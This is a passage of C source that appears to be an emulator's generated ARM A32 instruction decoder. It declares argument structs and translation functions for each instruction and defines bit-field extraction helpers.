int rd; int rm; int rn; int s; } arg_s_rrrr; typedef struct { int imm; int rd; int rn; int satimm; int sh; } arg_sat; typedef struct { int imm; int rd; int rn; int rt; int rt2; } arg_strex; typedef arg_s_rrr_shi arg_AND_rrri; static bool trans_AND_rrri(DisasContext *ctx, arg_AND_rrri *a); typedef arg_s_rrr_shi arg_EOR_rrri; static bool trans_EOR_rrri(DisasContext *ctx, arg_EOR_rrri *a); typedef arg_s_rrr_shi arg_SUB_rrri; static bool trans_SUB_rrri(DisasContext *ctx, arg_SUB_rrri *a); typedef arg_s_rrr_shi arg_RSB_rrri; static bool trans_RSB_rrri(DisasContext *ctx, arg_RSB_rrri *a); typedef arg_s_rrr_shi arg_ADD_rrri; static bool trans_ADD_rrri(DisasContext *ctx, arg_ADD_rrri *a); typedef arg_s_rrr_shi arg_ADC_rrri; static bool trans_ADC_rrri(DisasContext *ctx, arg_ADC_rrri *a); typedef arg_s_rrr_shi arg_SBC_rrri; static bool trans_SBC_rrri(DisasContext *ctx, arg_SBC_rrri *a); typedef arg_s_rrr_shi arg_RSC_rrri; static bool trans_RSC_rrri(DisasContext *ctx, arg_RSC_rrri *a); typedef arg_s_rrr_shi arg_TST_xrri; static bool trans_TST_xrri(DisasContext *ctx, arg_TST_xrri *a); typedef arg_s_rrr_shi arg_TEQ_xrri; static bool trans_TEQ_xrri(DisasContext *ctx, arg_TEQ_xrri *a); typedef arg_s_rrr_shi arg_CMP_xrri; static bool trans_CMP_xrri(DisasContext *ctx, arg_CMP_xrri *a); typedef arg_s_rrr_shi arg_CMN_xrri; static bool trans_CMN_xrri(DisasContext *ctx, arg_CMN_xrri *a); typedef arg_s_rrr_shi arg_ORR_rrri; static bool trans_ORR_rrri(DisasContext *ctx, arg_ORR_rrri *a); typedef arg_s_rrr_shi arg_MOV_rxri; static bool trans_MOV_rxri(DisasContext *ctx, arg_MOV_rxri *a); typedef arg_s_rrr_shi arg_BIC_rrri; static bool trans_BIC_rrri(DisasContext *ctx, arg_BIC_rrri *a); typedef arg_s_rrr_shi arg_MVN_rxri; static bool trans_MVN_rxri(DisasContext *ctx, arg_MVN_rxri *a); typedef arg_ri arg_MOVW; static bool trans_MOVW(DisasContext *ctx, arg_MOVW *a); typedef arg_ri arg_MOVT; static bool trans_MOVT(DisasContext *ctx, arg_MOVT *a); typedef arg_s_rrr_shr arg_AND_rrrr; static bool 
trans_AND_rrrr(DisasContext *ctx, arg_AND_rrrr *a); typedef arg_s_rrr_shr arg_EOR_rrrr; static bool trans_EOR_rrrr(DisasContext *ctx, arg_EOR_rrrr *a); typedef arg_s_rrr_shr arg_SUB_rrrr; static bool trans_SUB_rrrr(DisasContext *ctx, arg_SUB_rrrr *a); typedef arg_s_rrr_shr arg_RSB_rrrr; static bool trans_RSB_rrrr(DisasContext *ctx, arg_RSB_rrrr *a); typedef arg_s_rrr_shr arg_ADD_rrrr; static bool trans_ADD_rrrr(DisasContext *ctx, arg_ADD_rrrr *a); typedef arg_s_rrr_shr arg_ADC_rrrr; static bool trans_ADC_rrrr(DisasContext *ctx, arg_ADC_rrrr *a); typedef arg_s_rrr_shr arg_SBC_rrrr; static bool trans_SBC_rrrr(DisasContext *ctx, arg_SBC_rrrr *a); typedef arg_s_rrr_shr arg_RSC_rrrr; static bool trans_RSC_rrrr(DisasContext *ctx, arg_RSC_rrrr *a); typedef arg_s_rrr_shr arg_TST_xrrr; static bool trans_TST_xrrr(DisasContext *ctx, arg_TST_xrrr *a); typedef arg_s_rrr_shr arg_TEQ_xrrr; static bool trans_TEQ_xrrr(DisasContext *ctx, arg_TEQ_xrrr *a); typedef arg_s_rrr_shr arg_CMP_xrrr; static bool trans_CMP_xrrr(DisasContext *ctx, arg_CMP_xrrr *a); typedef arg_s_rrr_shr arg_CMN_xrrr; static bool trans_CMN_xrrr(DisasContext *ctx, arg_CMN_xrrr *a); typedef arg_s_rrr_shr arg_ORR_rrrr; static bool trans_ORR_rrrr(DisasContext *ctx, arg_ORR_rrrr *a); typedef arg_s_rrr_shr arg_MOV_rxrr; static bool trans_MOV_rxrr(DisasContext *ctx, arg_MOV_rxrr *a); typedef arg_s_rrr_shr arg_BIC_rrrr; static bool trans_BIC_rrrr(DisasContext *ctx, arg_BIC_rrrr *a); typedef arg_s_rrr_shr arg_MVN_rxrr; static bool trans_MVN_rxrr(DisasContext *ctx, arg_MVN_rxrr *a); typedef arg_s_rri_rot arg_AND_rri; static bool trans_AND_rri(DisasContext *ctx, arg_AND_rri *a); typedef arg_s_rri_rot arg_EOR_rri; static bool trans_EOR_rri(DisasContext *ctx, arg_EOR_rri *a); typedef arg_s_rri_rot arg_SUB_rri; static bool trans_SUB_rri(DisasContext *ctx, arg_SUB_rri *a); typedef arg_s_rri_rot arg_RSB_rri; static bool trans_RSB_rri(DisasContext *ctx, arg_RSB_rri *a); typedef arg_s_rri_rot arg_ADD_rri; static bool trans_ADD_rri(DisasContext *ctx, arg_ADD_rri *a); typedef arg_s_rri_rot arg_ADC_rri; static bool trans_ADC_rri(DisasContext *ctx, arg_ADC_rri *a); typedef arg_s_rri_rot arg_SBC_rri; static bool trans_SBC_rri(DisasContext *ctx, arg_SBC_rri *a); typedef arg_s_rri_rot arg_RSC_rri; static bool trans_RSC_rri(DisasContext *ctx, arg_RSC_rri *a); typedef arg_s_rri_rot arg_TST_xri; static bool trans_TST_xri(DisasContext *ctx, arg_TST_xri *a); typedef arg_s_rri_rot arg_TEQ_xri; static bool trans_TEQ_xri(DisasContext *ctx, arg_TEQ_xri *a); typedef arg_s_rri_rot arg_CMP_xri; static bool trans_CMP_xri(DisasContext *ctx, arg_CMP_xri *a); typedef arg_s_rri_rot arg_CMN_xri; static bool trans_CMN_xri(DisasContext *ctx, arg_CMN_xri *a); typedef arg_s_rri_rot arg_ORR_rri; static bool trans_ORR_rri(DisasContext *ctx, arg_ORR_rri *a); typedef arg_s_rri_rot arg_MOV_rxi; static bool trans_MOV_rxi(DisasContext *ctx, arg_MOV_rxi *a); typedef arg_s_rri_rot arg_BIC_rri; static bool trans_BIC_rri(DisasContext *ctx, arg_BIC_rri *a); typedef arg_s_rri_rot arg_MVN_rxi; static bool trans_MVN_rxi(DisasContext *ctx, arg_MVN_rxi *a); typedef arg_s_rrrr arg_MUL; static bool trans_MUL(DisasContext *ctx, arg_MUL *a); typedef arg_s_rrrr arg_MLA; static bool trans_MLA(DisasContext *ctx, arg_MLA *a); typedef arg_rrrr arg_UMAAL; static bool trans_UMAAL(DisasContext *ctx, arg_UMAAL *a); typedef arg_rrrr arg_MLS; static bool trans_MLS(DisasContext *ctx, arg_MLS *a); typedef arg_s_rrrr arg_UMULL; static bool trans_UMULL(DisasContext *ctx, arg_UMULL *a); typedef arg_s_rrrr arg_UMLAL; 
static bool trans_UMLAL(DisasContext *ctx, arg_UMLAL *a); typedef arg_s_rrrr arg_SMULL; static bool trans_SMULL(DisasContext *ctx, arg_SMULL *a); typedef arg_s_rrrr arg_SMLAL; static bool trans_SMLAL(DisasContext *ctx, arg_SMLAL *a); typedef arg_rrr arg_QADD; static bool trans_QADD(DisasContext *ctx, arg_QADD *a); typedef arg_rrr arg_QSUB; static bool trans_QSUB(DisasContext *ctx, arg_QSUB *a); typedef arg_rrr arg_QDADD; static bool trans_QDADD(DisasContext *ctx, arg_QDADD *a); typedef arg_rrr arg_QDSUB; static bool trans_QDSUB(DisasContext *ctx, arg_QDSUB *a); typedef arg_rrrr arg_SMLABB; static bool trans_SMLABB(DisasContext *ctx, arg_SMLABB *a); typedef arg_rrrr arg_SMLABT; static bool trans_SMLABT(DisasContext *ctx, arg_SMLABT *a); typedef arg_rrrr arg_SMLATB; static bool trans_SMLATB(DisasContext *ctx, arg_SMLATB *a); typedef arg_rrrr arg_SMLATT; static bool trans_SMLATT(DisasContext *ctx, arg_SMLATT *a); typedef arg_rrrr arg_SMLAWB; static bool trans_SMLAWB(DisasContext *ctx, arg_SMLAWB *a); typedef arg_rrrr arg_SMULWB; static bool trans_SMULWB(DisasContext *ctx, arg_SMULWB *a); typedef arg_rrrr arg_SMLAWT; static bool trans_SMLAWT(DisasContext *ctx, arg_SMLAWT *a); typedef arg_rrrr arg_SMULWT; static bool trans_SMULWT(DisasContext *ctx, arg_SMULWT *a); typedef arg_rrrr arg_SMLALBB; static bool trans_SMLALBB(DisasContext *ctx, arg_SMLALBB *a); typedef arg_rrrr arg_SMLALBT; static bool trans_SMLALBT(DisasContext *ctx, arg_SMLALBT *a); typedef arg_rrrr arg_SMLALTB; static bool trans_SMLALTB(DisasContext *ctx, arg_SMLALTB *a); typedef arg_rrrr arg_SMLALTT; static bool trans_SMLALTT(DisasContext *ctx, arg_SMLALTT *a); typedef arg_rrrr arg_SMULBB; static bool trans_SMULBB(DisasContext *ctx, arg_SMULBB *a); typedef arg_rrrr arg_SMULBT; static bool trans_SMULBT(DisasContext *ctx, arg_SMULBT *a); typedef arg_rrrr arg_SMULTB; static bool trans_SMULTB(DisasContext *ctx, arg_SMULTB *a); typedef arg_rrrr arg_SMULTT; static bool trans_SMULTT(DisasContext *ctx, arg_SMULTT *a); typedef arg_empty arg_YIELD; static bool trans_YIELD(DisasContext *ctx, arg_YIELD *a); typedef arg_empty arg_WFE; static bool trans_WFE(DisasContext *ctx, arg_WFE *a); typedef arg_empty arg_WFI; static bool trans_WFI(DisasContext *ctx, arg_WFI *a); typedef arg_empty arg_NOP; static bool trans_NOP(DisasContext *ctx, arg_NOP *a); typedef arg_msr_i arg_MSR_imm; static bool trans_MSR_imm(DisasContext *ctx, arg_MSR_imm *a); typedef arg_rrr arg_CRC32B; static bool trans_CRC32B(DisasContext *ctx, arg_CRC32B *a); typedef arg_rrr arg_CRC32H; static bool trans_CRC32H(DisasContext *ctx, arg_CRC32H *a); typedef arg_rrr arg_CRC32W; static bool trans_CRC32W(DisasContext *ctx, arg_CRC32W *a); typedef arg_rrr arg_CRC32CB; static bool trans_CRC32CB(DisasContext *ctx, arg_CRC32CB *a); typedef arg_rrr arg_CRC32CH; static bool trans_CRC32CH(DisasContext *ctx, arg_CRC32CH *a); typedef arg_rrr arg_CRC32CW; static bool trans_CRC32CW(DisasContext *ctx, arg_CRC32CW *a); typedef arg_mrs_bank arg_MRS_bank; static bool trans_MRS_bank(DisasContext *ctx, arg_MRS_bank *a); typedef arg_msr_bank arg_MSR_bank; static bool trans_MSR_bank(DisasContext *ctx, arg_MSR_bank *a); typedef arg_mrs_reg arg_MRS_reg; static bool trans_MRS_reg(DisasContext *ctx, arg_MRS_reg *a); typedef arg_msr_reg arg_MSR_reg; static bool trans_MSR_reg(DisasContext *ctx, arg_MSR_reg *a); typedef arg_r arg_BX; static bool trans_BX(DisasContext *ctx, arg_BX *a); typedef arg_r arg_BXJ; static bool trans_BXJ(DisasContext *ctx, arg_BXJ *a); typedef arg_r arg_BLX_r; static bool 
trans_BLX_r(DisasContext *ctx, arg_BLX_r *a); typedef arg_rr arg_CLZ; static bool trans_CLZ(DisasContext *ctx, arg_CLZ *a); typedef arg_empty arg_ERET; static bool trans_ERET(DisasContext *ctx, arg_ERET *a); typedef arg_i arg_HLT; static bool trans_HLT(DisasContext *ctx, arg_HLT *a); typedef arg_i arg_BKPT; static bool trans_BKPT(DisasContext *ctx, arg_BKPT *a); typedef arg_i arg_HVC; static bool trans_HVC(DisasContext *ctx, arg_HVC *a); typedef arg_i arg_SMC; static bool trans_SMC(DisasContext *ctx, arg_SMC *a); typedef arg_ldst_rr arg_STRH_rr; static bool trans_STRH_rr(DisasContext *ctx, arg_STRH_rr *a); typedef arg_ldst_rr arg_LDRD_rr; static bool trans_LDRD_rr(DisasContext *ctx, arg_LDRD_rr *a); typedef arg_ldst_rr arg_STRD_rr; static bool trans_STRD_rr(DisasContext *ctx, arg_STRD_rr *a); typedef arg_ldst_rr arg_LDRH_rr; static bool trans_LDRH_rr(DisasContext *ctx, arg_LDRH_rr *a); typedef arg_ldst_rr arg_LDRSB_rr; static bool trans_LDRSB_rr(DisasContext *ctx, arg_LDRSB_rr *a); typedef arg_ldst_rr arg_LDRSH_rr; static bool trans_LDRSH_rr(DisasContext *ctx, arg_LDRSH_rr *a); typedef arg_ldst_rr arg_STRHT_rr; static bool trans_STRHT_rr(DisasContext *ctx, arg_STRHT_rr *a); typedef arg_ldst_rr arg_LDRHT_rr; static bool trans_LDRHT_rr(DisasContext *ctx, arg_LDRHT_rr *a); typedef arg_ldst_rr arg_LDRSBT_rr; static bool trans_LDRSBT_rr(DisasContext *ctx, arg_LDRSBT_rr *a); typedef arg_ldst_rr arg_LDRSHT_rr; static bool trans_LDRSHT_rr(DisasContext *ctx, arg_LDRSHT_rr *a); typedef arg_ldst_rr arg_STR_rr; static bool trans_STR_rr(DisasContext *ctx, arg_STR_rr *a); typedef arg_ldst_rr arg_STRB_rr; static bool trans_STRB_rr(DisasContext *ctx, arg_STRB_rr *a); typedef arg_ldst_rr arg_LDR_rr; static bool trans_LDR_rr(DisasContext *ctx, arg_LDR_rr *a); typedef arg_ldst_rr arg_LDRB_rr; static bool trans_LDRB_rr(DisasContext *ctx, arg_LDRB_rr *a); typedef arg_ldst_rr arg_STRT_rr; static bool trans_STRT_rr(DisasContext *ctx, arg_STRT_rr *a); typedef arg_ldst_rr arg_STRBT_rr; static bool trans_STRBT_rr(DisasContext *ctx, arg_STRBT_rr *a); typedef arg_ldst_rr arg_LDRT_rr; static bool trans_LDRT_rr(DisasContext *ctx, arg_LDRT_rr *a); typedef arg_ldst_rr arg_LDRBT_rr; static bool trans_LDRBT_rr(DisasContext *ctx, arg_LDRBT_rr *a); typedef arg_ldst_ri arg_STRH_ri; static bool trans_STRH_ri(DisasContext *ctx, arg_STRH_ri *a); typedef arg_ldst_ri arg_LDRD_ri_a32; static bool trans_LDRD_ri_a32(DisasContext *ctx, arg_LDRD_ri_a32 *a); typedef arg_ldst_ri arg_STRD_ri_a32; static bool trans_STRD_ri_a32(DisasContext *ctx, arg_STRD_ri_a32 *a); typedef arg_ldst_ri arg_LDRH_ri; static bool trans_LDRH_ri(DisasContext *ctx, arg_LDRH_ri *a); typedef arg_ldst_ri arg_LDRSB_ri; static bool trans_LDRSB_ri(DisasContext *ctx, arg_LDRSB_ri *a); typedef arg_ldst_ri arg_LDRSH_ri; static bool trans_LDRSH_ri(DisasContext *ctx, arg_LDRSH_ri *a); typedef arg_ldst_ri arg_STRHT_ri; static bool trans_STRHT_ri(DisasContext *ctx, arg_STRHT_ri *a); typedef arg_ldst_ri arg_LDRHT_ri; static bool trans_LDRHT_ri(DisasContext *ctx, arg_LDRHT_ri *a); typedef arg_ldst_ri arg_LDRSBT_ri; static bool trans_LDRSBT_ri(DisasContext *ctx, arg_LDRSBT_ri *a); typedef arg_ldst_ri arg_LDRSHT_ri; static bool trans_LDRSHT_ri(DisasContext *ctx, arg_LDRSHT_ri *a); typedef arg_ldst_ri arg_STR_ri; static bool trans_STR_ri(DisasContext *ctx, arg_STR_ri *a); typedef arg_ldst_ri arg_STRB_ri; static bool trans_STRB_ri(DisasContext *ctx, arg_STRB_ri *a); typedef arg_ldst_ri arg_LDR_ri; static bool trans_LDR_ri(DisasContext *ctx, arg_LDR_ri *a); typedef arg_ldst_ri 
arg_LDRB_ri; static bool trans_LDRB_ri(DisasContext *ctx, arg_LDRB_ri *a); typedef arg_ldst_ri arg_STRT_ri; static bool trans_STRT_ri(DisasContext *ctx, arg_STRT_ri *a); typedef arg_ldst_ri arg_STRBT_ri; static bool trans_STRBT_ri(DisasContext *ctx, arg_STRBT_ri *a); typedef arg_ldst_ri arg_LDRT_ri; static bool trans_LDRT_ri(DisasContext *ctx, arg_LDRT_ri *a); typedef arg_ldst_ri arg_LDRBT_ri; static bool trans_LDRBT_ri(DisasContext *ctx, arg_LDRBT_ri *a); typedef arg_disas_a3226 arg_SWP; static bool trans_SWP(DisasContext *ctx, arg_SWP *a); typedef arg_disas_a3226 arg_SWPB; static bool trans_SWPB(DisasContext *ctx, arg_SWPB *a); typedef arg_strex arg_STREX; static bool trans_STREX(DisasContext *ctx, arg_STREX *a); typedef arg_strex arg_STREXD_a32; static bool trans_STREXD_a32(DisasContext *ctx, arg_STREXD_a32 *a); typedef arg_strex arg_STREXB; static bool trans_STREXB(DisasContext *ctx, arg_STREXB *a); typedef arg_strex arg_STREXH; static bool trans_STREXH(DisasContext *ctx, arg_STREXH *a); typedef arg_strex arg_STLEX; static bool trans_STLEX(DisasContext *ctx, arg_STLEX *a); typedef arg_strex arg_STLEXD_a32; static bool trans_STLEXD_a32(DisasContext *ctx, arg_STLEXD_a32 *a); typedef arg_strex arg_STLEXB; static bool trans_STLEXB(DisasContext *ctx, arg_STLEXB *a); typedef arg_strex arg_STLEXH; static bool trans_STLEXH(DisasContext *ctx, arg_STLEXH *a); typedef arg_ldrex arg_STL; static bool trans_STL(DisasContext *ctx, arg_STL *a); typedef arg_ldrex arg_STLB; static bool trans_STLB(DisasContext *ctx, arg_STLB *a); typedef arg_ldrex arg_STLH; static bool trans_STLH(DisasContext *ctx, arg_STLH *a); typedef arg_ldrex arg_LDREX; static bool trans_LDREX(DisasContext *ctx, arg_LDREX *a); typedef arg_ldrex arg_LDREXD_a32; static bool trans_LDREXD_a32(DisasContext *ctx, arg_LDREXD_a32 *a); typedef arg_ldrex arg_LDREXB; static bool trans_LDREXB(DisasContext *ctx, arg_LDREXB *a); typedef arg_ldrex arg_LDREXH; static bool trans_LDREXH(DisasContext *ctx, arg_LDREXH *a); typedef arg_ldrex arg_LDAEX; static bool trans_LDAEX(DisasContext *ctx, arg_LDAEX *a); typedef arg_ldrex arg_LDAEXD_a32; static bool trans_LDAEXD_a32(DisasContext *ctx, arg_LDAEXD_a32 *a); typedef arg_ldrex arg_LDAEXB; static bool trans_LDAEXB(DisasContext *ctx, arg_LDAEXB *a); typedef arg_ldrex arg_LDAEXH; static bool trans_LDAEXH(DisasContext *ctx, arg_LDAEXH *a); typedef arg_ldrex arg_LDA; static bool trans_LDA(DisasContext *ctx, arg_LDA *a); typedef arg_ldrex arg_LDAB; static bool trans_LDAB(DisasContext *ctx, arg_LDAB *a); typedef arg_ldrex arg_LDAH; static bool trans_LDAH(DisasContext *ctx, arg_LDAH *a); typedef arg_rrrr arg_USADA8; static bool trans_USADA8(DisasContext *ctx, arg_USADA8 *a); typedef arg_bfx arg_SBFX; static bool trans_SBFX(DisasContext *ctx, arg_SBFX *a); typedef arg_bfx arg_UBFX; static bool trans_UBFX(DisasContext *ctx, arg_UBFX *a); typedef arg_bfi arg_BFCI; static bool trans_BFCI(DisasContext *ctx, arg_BFCI *a); typedef arg_empty arg_UDF; static bool trans_UDF(DisasContext *ctx, arg_UDF *a); typedef arg_rrr arg_SADD16; static bool trans_SADD16(DisasContext *ctx, arg_SADD16 *a); typedef arg_rrr arg_SASX; static bool trans_SASX(DisasContext *ctx, arg_SASX *a); typedef arg_rrr arg_SSAX; static bool trans_SSAX(DisasContext *ctx, arg_SSAX *a); typedef arg_rrr arg_SSUB16; static bool trans_SSUB16(DisasContext *ctx, arg_SSUB16 *a); typedef arg_rrr arg_SADD8; static bool trans_SADD8(DisasContext *ctx, arg_SADD8 *a); typedef arg_rrr arg_SSUB8; static bool trans_SSUB8(DisasContext *ctx, arg_SSUB8 *a); typedef arg_rrr 
arg_QADD16; static bool trans_QADD16(DisasContext *ctx, arg_QADD16 *a); typedef arg_rrr arg_QASX; static bool trans_QASX(DisasContext *ctx, arg_QASX *a); typedef arg_rrr arg_QSAX; static bool trans_QSAX(DisasContext *ctx, arg_QSAX *a); typedef arg_rrr arg_QSUB16; static bool trans_QSUB16(DisasContext *ctx, arg_QSUB16 *a); typedef arg_rrr arg_QADD8; static bool trans_QADD8(DisasContext *ctx, arg_QADD8 *a); typedef arg_rrr arg_QSUB8; static bool trans_QSUB8(DisasContext *ctx, arg_QSUB8 *a); typedef arg_rrr arg_SHADD16; static bool trans_SHADD16(DisasContext *ctx, arg_SHADD16 *a); typedef arg_rrr arg_SHASX; static bool trans_SHASX(DisasContext *ctx, arg_SHASX *a); typedef arg_rrr arg_SHSAX; static bool trans_SHSAX(DisasContext *ctx, arg_SHSAX *a); typedef arg_rrr arg_SHSUB16; static bool trans_SHSUB16(DisasContext *ctx, arg_SHSUB16 *a); typedef arg_rrr arg_SHADD8; static bool trans_SHADD8(DisasContext *ctx, arg_SHADD8 *a); typedef arg_rrr arg_SHSUB8; static bool trans_SHSUB8(DisasContext *ctx, arg_SHSUB8 *a); typedef arg_rrr arg_UADD16; static bool trans_UADD16(DisasContext *ctx, arg_UADD16 *a); typedef arg_rrr arg_UASX; static bool trans_UASX(DisasContext *ctx, arg_UASX *a); typedef arg_rrr arg_USAX; static bool trans_USAX(DisasContext *ctx, arg_USAX *a); typedef arg_rrr arg_USUB16; static bool trans_USUB16(DisasContext *ctx, arg_USUB16 *a); typedef arg_rrr arg_UADD8; static bool trans_UADD8(DisasContext *ctx, arg_UADD8 *a); typedef arg_rrr arg_USUB8; static bool trans_USUB8(DisasContext *ctx, arg_USUB8 *a); typedef arg_rrr arg_UQADD16; static bool trans_UQADD16(DisasContext *ctx, arg_UQADD16 *a); typedef arg_rrr arg_UQASX; static bool trans_UQASX(DisasContext *ctx, arg_UQASX *a); typedef arg_rrr arg_UQSAX; static bool trans_UQSAX(DisasContext *ctx, arg_UQSAX *a); typedef arg_rrr arg_UQSUB16; static bool trans_UQSUB16(DisasContext *ctx, arg_UQSUB16 *a); typedef arg_rrr arg_UQADD8; static bool trans_UQADD8(DisasContext *ctx, arg_UQADD8 *a); typedef arg_rrr arg_UQSUB8; static bool trans_UQSUB8(DisasContext *ctx, arg_UQSUB8 *a); typedef arg_rrr arg_UHADD16; static bool trans_UHADD16(DisasContext *ctx, arg_UHADD16 *a); typedef arg_rrr arg_UHASX; static bool trans_UHASX(DisasContext *ctx, arg_UHASX *a); typedef arg_rrr arg_UHSAX; static bool trans_UHSAX(DisasContext *ctx, arg_UHSAX *a); typedef arg_rrr arg_UHSUB16; static bool trans_UHSUB16(DisasContext *ctx, arg_UHSUB16 *a); typedef arg_rrr arg_UHADD8; static bool trans_UHADD8(DisasContext *ctx, arg_UHADD8 *a); typedef arg_rrr arg_UHSUB8; static bool trans_UHSUB8(DisasContext *ctx, arg_UHSUB8 *a); typedef arg_pkh arg_PKH; static bool trans_PKH(DisasContext *ctx, arg_PKH *a); typedef arg_sat arg_SSAT; static bool trans_SSAT(DisasContext *ctx, arg_SSAT *a); typedef arg_sat arg_USAT; static bool trans_USAT(DisasContext *ctx, arg_USAT *a); typedef arg_sat arg_SSAT16; static bool trans_SSAT16(DisasContext *ctx, arg_SSAT16 *a); typedef arg_sat arg_USAT16; static bool trans_USAT16(DisasContext *ctx, arg_USAT16 *a); typedef arg_rrr_rot arg_SXTAB16; static bool trans_SXTAB16(DisasContext *ctx, arg_SXTAB16 *a); typedef arg_rrr_rot arg_SXTAB; static bool trans_SXTAB(DisasContext *ctx, arg_SXTAB *a); typedef arg_rrr_rot arg_SXTAH; static bool trans_SXTAH(DisasContext *ctx, arg_SXTAH *a); typedef arg_rrr_rot arg_UXTAB16; static bool trans_UXTAB16(DisasContext *ctx, arg_UXTAB16 *a); typedef arg_rrr_rot arg_UXTAB; static bool trans_UXTAB(DisasContext *ctx, arg_UXTAB *a); typedef arg_rrr_rot arg_UXTAH; static bool trans_UXTAH(DisasContext *ctx, arg_UXTAH *a); 
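/*
 * A hypothetical walk-through of the field extraction used by the helpers
 * below (illustrative, not generated output): for the A32 encoding
 * 0xe0811002 (ADD r1, r1, r2), disas_a32_extract_s_rrr_shi yields
 * s = extract32(insn, 20, 1) = 0, rn = extract32(insn, 16, 4) = 1,
 * rd = extract32(insn, 12, 4) = 1, shim = extract32(insn, 7, 5) = 0,
 * shty = extract32(insn, 5, 2) = 0 and rm = extract32(insn, 0, 4) = 2,
 * after which the decoder dispatches to trans_ADD_rrri.
 */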
typedef arg_rrr arg_SEL; static bool trans_SEL(DisasContext *ctx, arg_SEL *a); typedef arg_rr arg_REV; static bool trans_REV(DisasContext *ctx, arg_REV *a); typedef arg_rr arg_REV16; static bool trans_REV16(DisasContext *ctx, arg_REV16 *a); typedef arg_rr arg_REVSH; static bool trans_REVSH(DisasContext *ctx, arg_REVSH *a); typedef arg_rr arg_RBIT; static bool trans_RBIT(DisasContext *ctx, arg_RBIT *a); typedef arg_rrrr arg_SMLAD; static bool trans_SMLAD(DisasContext *ctx, arg_SMLAD *a); typedef arg_rrrr arg_SMLADX; static bool trans_SMLADX(DisasContext *ctx, arg_SMLADX *a); typedef arg_rrrr arg_SMLSD; static bool trans_SMLSD(DisasContext *ctx, arg_SMLSD *a); typedef arg_rrrr arg_SMLSDX; static bool trans_SMLSDX(DisasContext *ctx, arg_SMLSDX *a); typedef arg_rrr arg_SDIV; static bool trans_SDIV(DisasContext *ctx, arg_SDIV *a); typedef arg_rrr arg_UDIV; static bool trans_UDIV(DisasContext *ctx, arg_UDIV *a); typedef arg_rrrr arg_SMLALD; static bool trans_SMLALD(DisasContext *ctx, arg_SMLALD *a); typedef arg_rrrr arg_SMLALDX; static bool trans_SMLALDX(DisasContext *ctx, arg_SMLALDX *a); typedef arg_rrrr arg_SMLSLD; static bool trans_SMLSLD(DisasContext *ctx, arg_SMLSLD *a); typedef arg_rrrr arg_SMLSLDX; static bool trans_SMLSLDX(DisasContext *ctx, arg_SMLSLDX *a); typedef arg_rrrr arg_SMMLA; static bool trans_SMMLA(DisasContext *ctx, arg_SMMLA *a); typedef arg_rrrr arg_SMMLAR; static bool trans_SMMLAR(DisasContext *ctx, arg_SMMLAR *a); typedef arg_rrrr arg_SMMLS; static bool trans_SMMLS(DisasContext *ctx, arg_SMMLS *a); typedef arg_rrrr arg_SMMLSR; static bool trans_SMMLSR(DisasContext *ctx, arg_SMMLSR *a); typedef arg_ldst_block arg_STM; static bool trans_STM(DisasContext *ctx, arg_STM *a); typedef arg_ldst_block arg_LDM_a32; static bool trans_LDM_a32(DisasContext *ctx, arg_LDM_a32 *a); typedef arg_i arg_B; static bool trans_B(DisasContext *ctx, arg_B *a); typedef arg_i arg_BL; static bool trans_BL(DisasContext *ctx, arg_BL *a); typedef arg_i arg_SVC; static bool trans_SVC(DisasContext *ctx, arg_SVC *a); static void disas_a32_extract_S_xri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->rot = times_2(ctx, extract32(insn, 8, 4)); a->rd = 0; a->s = 1; } static void disas_a32_extract_S_xrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->shim = extract32(insn, 7, 5); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->s = 1; a->rd = 0; } static void disas_a32_extract_S_xrr_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rs = extract32(insn, 8, 4); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->rd = 0; a->s = 1; } static void disas_a32_extract_bfx(DisasContext *ctx, arg_bfx *a, uint32_t insn) { a->widthm1 = extract32(insn, 16, 5); a->rd = extract32(insn, 12, 4); a->lsb = extract32(insn, 7, 5); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_branch(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = times_4(ctx, sextract32(insn, 0, 24)); } static void disas_a32_extract_disas_a32_Fmt_16(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void disas_a32_extract_disas_a32_Fmt_20(DisasContext *ctx, arg_mrs_bank *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->rd = extract32(insn, 12, 4); a->sysm = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 8, 1)); } static void disas_a32_extract_disas_a32_Fmt_21(DisasContext *ctx, arg_msr_bank *a, uint32_t insn) { a->r = 
extract32(insn, 22, 1); a->rn = extract32(insn, 0, 4); a->sysm = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 8, 1)); } static void disas_a32_extract_disas_a32_Fmt_22(DisasContext *ctx, arg_mrs_reg *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->rd = extract32(insn, 12, 4); } static void disas_a32_extract_disas_a32_Fmt_23(DisasContext *ctx, arg_msr_reg *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->mask = extract32(insn, 16, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_24(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_42(DisasContext *ctx, arg_bfi *a, uint32_t insn) { a->msb = extract32(insn, 16, 5); a->rd = extract32(insn, 12, 4); a->lsb = extract32(insn, 7, 5); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_43(DisasContext *ctx, arg_pkh *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 7, 5); a->tb = extract32(insn, 6, 1); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_48(DisasContext *ctx, arg_ldst_block *a, uint32_t insn) { a->b = extract32(insn, 24, 1); a->i = extract32(insn, 23, 1); a->u = extract32(insn, 22, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->list = extract32(insn, 0, 16); } static void disas_a32_extract_disas_a32_Fmt_50(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = extract32(insn, 0, 24); } static void disas_a32_extract_i16(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 0, 4), 